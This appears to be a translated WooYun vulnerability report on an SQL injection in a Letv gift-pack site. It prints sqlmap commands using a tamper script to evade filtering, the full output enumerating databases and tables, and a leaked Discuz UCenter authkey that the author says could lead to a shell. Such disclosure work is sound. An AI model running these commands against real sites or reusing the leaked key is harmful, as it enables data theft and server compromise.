
Vulnerability Summary

Defect ID: wooyun-2015-0126236

Title: SQL injection on a Letv (乐视网) site leaks multiple databases

Vendor: 乐视网 (Letv)

Author: 蓝冰

Submitted: 2015-07-12 09:29

Fixed: 2015-08-26 10:06

Published: 2015-08-26 10:06

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org. For questions or help, contact [email protected]



Vulnerability Details

Disclosure status:

2015-07-12: Details sent to the vendor; awaiting vendor action
2015-07-12: Vendor confirmed; details disclosed to the vendor only
2015-07-22: Details disclosed to core white hats and domain experts
2015-08-01: Details disclosed to regular white hats
2015-08-11: Details disclosed to intern white hats
2015-08-26: Details disclosed to the public

Brief description:

Here I am again~

Detailed description:

URL: http://libao.g.letv.com/?gid=116
Injectable parameter: sid

[Screenshot omitted: 屏幕快照 2015-07-12 1.00.36.png]


After some quick manual testing I threw it straight at sqlmap. When it reached the time-based injection tests the site went down; the newbie-card lookup probably returns too much data, so the delays multiplied and the site collapsed. I then adjusted sqlmap's parameters:

sqlmap -r /root/post.txt --dbs -p sid --technique B --threads 1 --tamper=between


This way only boolean-based blind injection is tested. --tamper=between is used because the greater-than and less-than signs are filtered.

root@BlueIce:~# sqlmap -r /root/post.txt --dbs -p sid --technique B --threads 1 --tamper=between
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 23:47:53
[23:47:53] [INFO] parsing HTTP request from '/root/post.txt'
[23:47:53] [INFO] loading tamper script 'between'
[23:47:58] [INFO] testing connection to the target URL
[23:47:59] [INFO] testing if the target URL is stable. This can take a couple of seconds
[23:48:01] [INFO] target URL is stable
[23:48:01] [WARNING] heuristic (basic) test shows that POST parameter 'sid' might not be injectable
[23:48:01] [INFO] testing for SQL injection on POST parameter 'sid'
[23:48:01] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[23:48:03] [INFO] POST parameter 'sid' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
[23:48:05] [INFO] checking if the injection point on POST parameter 'sid' is a false positive
POST parameter 'sid' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 17 HTTP(s) requests:
---
Place: POST
Parameter: sid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: sid=7509 AND 9095=9095
---
[23:48:07] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[23:48:07] [INFO] testing MySQL
[23:48:07] [INFO] confirming MySQL
[23:48:07] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.3
back-end DBMS: MySQL >= 5.0.0
[23:48:07] [INFO] fetching database names
[23:48:07] [INFO] fetching number of databases
[23:48:07] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[23:48:07] [INFO] retrieved: 4
[23:48:08] [INFO] retrieved: information_schema
[23:48:35] [INFO] retrieved: game_bbs
[23:48:46] [INFO] retrieved: tg_admin
[23:49:00] [INFO] retrieved: web_admin
available databases [4]:
[*] game_bbs
[*] information_schema
[*] tg_admin
[*] web_admin


game_bbs is the game forum; I dumped the UC key from it:

Database: game_bbs
Table: pre_ucenter_applications
[1 entry]
+-------+---------+------------------+---------------+---------+---------+---------+------------------------------------------------------------------+----------+----------+----------+-----------+------------+-------------+--------------+
| appid | ip | url | name | type | extra | charset | authkey | recvnote | synlogin | allowips | dbcharset | viewprourl | apifilename | tagtemplates |
+-------+---------+------------------+---------------+---------+---------+---------+------------------------------------------------------------------+----------+----------+----------+-----------+------------+-------------+--------------+
| 1 | <blank> | http://bbs.ha.cc | Discuz! Board | DISCUZX | <blank> | <blank> | u0b8wfw1Wfd2t09ey0b4k87fY4Q0d4sfq2iaI4Uck8M4WbdeScO9i0I0Ier0Q6zf | 1 | 1 | <blank> | <blank> | <blank> | uc.php | <blank> |
+-------+---------+------------------+---------------+---------+---------+---------+------------------------------------------------------------------+----------+----------+----------+-----------+------------+-------------+--------------+


With the UC key you could get a shell, but the forum seems to be under maintenance? None of its features work, and requesting any PHP file returns a 403.
Below is the web_admin database, which should be game-related:

root@BlueIce:~# sqlmap -r /root/post.txt -D web_admin --tables  -p sid --technique B --threads 1 --tamper=between 
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 00:38:49
[00:38:49] [INFO] parsing HTTP request from '/root/post.txt'
[00:38:49] [INFO] loading tamper script 'between'
[00:38:49] [INFO] resuming back-end DBMS 'mysql'
[00:38:54] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: sid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: sid=7509 AND 9095=9095
---
[00:38:54] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[00:38:54] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.3
back-end DBMS: MySQL 5
[00:38:54] [INFO] fetching tables for database: 'web_admin'
[00:38:54] [INFO] fetching number of tables for database 'web_admin'
[00:38:54] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[00:38:54] [INFO] retrieved: 24
[00:38:56] [INFO] retrieved: yg_admins_resources
[00:39:21] [INFO] retrieved: yg_category
[00:39:33] [INFO] retrieved: yg_email_user
[00:39:47] [INFO] retrieved: yg_games
[00:39:55] [INFO] retrieved: yg_gameweb_info
[00:40:07] [INFO] retrieved: yg_guest_info
[00:40:20] [INFO] retrieved: yg_guest_logined_user_relation
[00:40:48] [INFO] retrieved: yg_guest_user_relation
[00:41:07] [INFO] retrieved: yg_lastest_togame
[00:41:27] [INFO] retrieved: yg_lb_cards
[00:41:38] [INFO] retrieved: yg_lb_cate
[00:41:43] [INFO] retrieved: yg_lb_info
[00:41:50] [INFO] retrieved: yg_news
[00:41:57] [INFO] retrieved: yg_orders_log
[00:42:11] [INFO] retrieved: yg_pay_log
[00:42:21] [INFO] retrieved: yg_pic
[00:42:26] [INFO] retrieved: yg_resources
[00:42:39] [INFO] retrieved: yg_role
[00:42:44] [INFO] retrieved: yg_role_resources
[00:42:59] [INFO] retrieved: yg_servers
[00:43:09] [INFO] retrieved: yg_system_admins
[00:43:26] [INFO] retrieved: yg_togame_log
[00:43:40] [INFO] retrieved: yg_user_info
[00:43:52] [INFO] retrieved: yg_user_map
Database: web_admin
[24 tables]
+--------------------------------+
| yg_admins_resources |
| yg_category |
| yg_email_user |
| yg_games |
| yg_gameweb_info |
| yg_guest_info |
| yg_guest_logined_user_relation |
| yg_guest_user_relation |
| yg_lastest_togame |
| yg_lb_cards |
| yg_lb_cate |
| yg_lb_info |
| yg_news |
| yg_orders_log |
| yg_pay_log |
| yg_pic |
| yg_resources |
| yg_role |
| yg_role_resources |
| yg_servers |
| yg_system_admins |
| yg_togame_log |
| yg_user_info |
| yg_user_map |
+--------------------------------+

Proof of vulnerability:

Proven above.

Fix suggestion:

Filter it, heh : )
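The report's boolean-blind finding and its "filter it" fix can be contrasted in code. The following added example (not code from the report or from letv.com; the `packs` table, rows and function names are constructed assumptions, since the real schema behind libao.g.letv.com is unknown) shows why an operator blacklist does not stop the `sid=7509 AND 9095=9095` probe sqlmap used, while type validation plus a bound parameter removes the oracle entirely.

```python
import sqlite3


def make_db():
    # Constructed stand-in for the gift-pack lookup table (assumption).
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE packs (sid INTEGER, gid INTEGER, name TEXT)")
    conn.executemany("INSERT INTO packs VALUES (?, ?, ?)",
                     [(7509, 116, "pack-a"), (7510, 116, "pack-b")])
    return conn


def blacklist_ok(value):
    """The 'just filter it' fix: reject the comparison operators the site
    already blocked. Nothing in '7509 AND 9095=9095' trips it."""
    return "<" not in value and ">" not in value


def lookup_concat(conn, sid):
    """Vulnerable pattern: the parameter is concatenated into the SQL text.
    Returns None when the blacklist rejects the input, else the row names."""
    if not blacklist_ok(sid):
        return None
    rows = conn.execute("SELECT name FROM packs WHERE sid = " + sid).fetchall()
    return [r[0] for r in rows]


def lookup_param(conn, sid):
    """Hardened pattern: validate the type, then bind the value. The input
    is only ever compared as a number and is never parsed as SQL."""
    try:
        sid_int = int(sid)
    except ValueError:
        return None
    rows = conn.execute("SELECT name FROM packs WHERE sid = ?", (sid_int,)).fetchall()
    return [r[0] for r in rows]


def boolean_oracle_present(lookup):
    """A blind-injection oracle exists when a true and a false appended
    condition produce different responses, which is exactly what
    sqlmap --technique B measures. Returns True if the oracle is present."""
    conn = make_db()
    true_probe = lookup(conn, "7509 AND 9095=9095")   # payload from the report
    false_probe = lookup(conn, "7509 AND 9095=9096")  # constructed false twin
    return true_probe != false_probe


if __name__ == "__main__":
    print("concatenated query leaks an oracle:", boolean_oracle_present(lookup_concat))
    print("bound parameter leaks an oracle:   ", boolean_oracle_present(lookup_param))
```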

Copyright notice: when reposting, please credit the source: 蓝冰@乌云


Vulnerability Response

Vendor response:

Severity: High

Vulnerability Rank: 12

Confirmed: 2015-07-12 10:04

Vendor reply:

Thanks, 蓝冰! Thank you for caring about Letv security; staff have been assigned to fix this.

Latest status:

None yet


Vulnerability rating:

Comments

  1. 2015-08-26 13:15 | 默之 (Regular white hat | Rank:334 Vulnerabilities:67 | Settle.)

    Bookmarking this